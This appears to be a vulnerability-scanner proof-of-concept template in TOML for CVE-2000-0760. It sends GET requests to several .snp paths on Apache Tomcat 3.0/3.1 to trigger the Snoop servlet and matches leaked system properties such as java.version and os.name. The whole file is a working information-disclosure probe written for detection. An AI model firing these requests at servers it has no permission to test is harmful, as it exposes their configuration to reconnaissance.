[info]
author = "AVE"
description = "Apache Tomcat 3.0/3.1 Snoop Servlet信息泄露漏洞PoC，通过请求任意.snp后缀路径触发Snoop Servlet返回系统环境变量、请求参数等敏感信息"
id = "POC-AVE-2000-0002"
name = "CVE-2000-0760 PoC"
severity = "medium"
tags = ["cve-2000-0760"]
vuln_id = [
    "CVE-2000-0760",
    "AVE-2000-0002",
]

[poc]
logic = "any"

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/examples/jsp/snp/anything.snp"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "java.version",
    "os.name",
    "java.home",
    "java.vendor",
    "user.dir",
]

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/jsp/snp/anything.snp"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "java.version",
    "os.name",
    "java.home",
    "java.vendor",
    "user.dir",
]

[[poc.requests]]
method = "GET"
path = "/{{BaseURL}}/snp/anything.snp"
protocol = "http"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = [
    "java.version",
    "os.name",
    "java.home",
    "java.vendor",
    "user.dir",
]
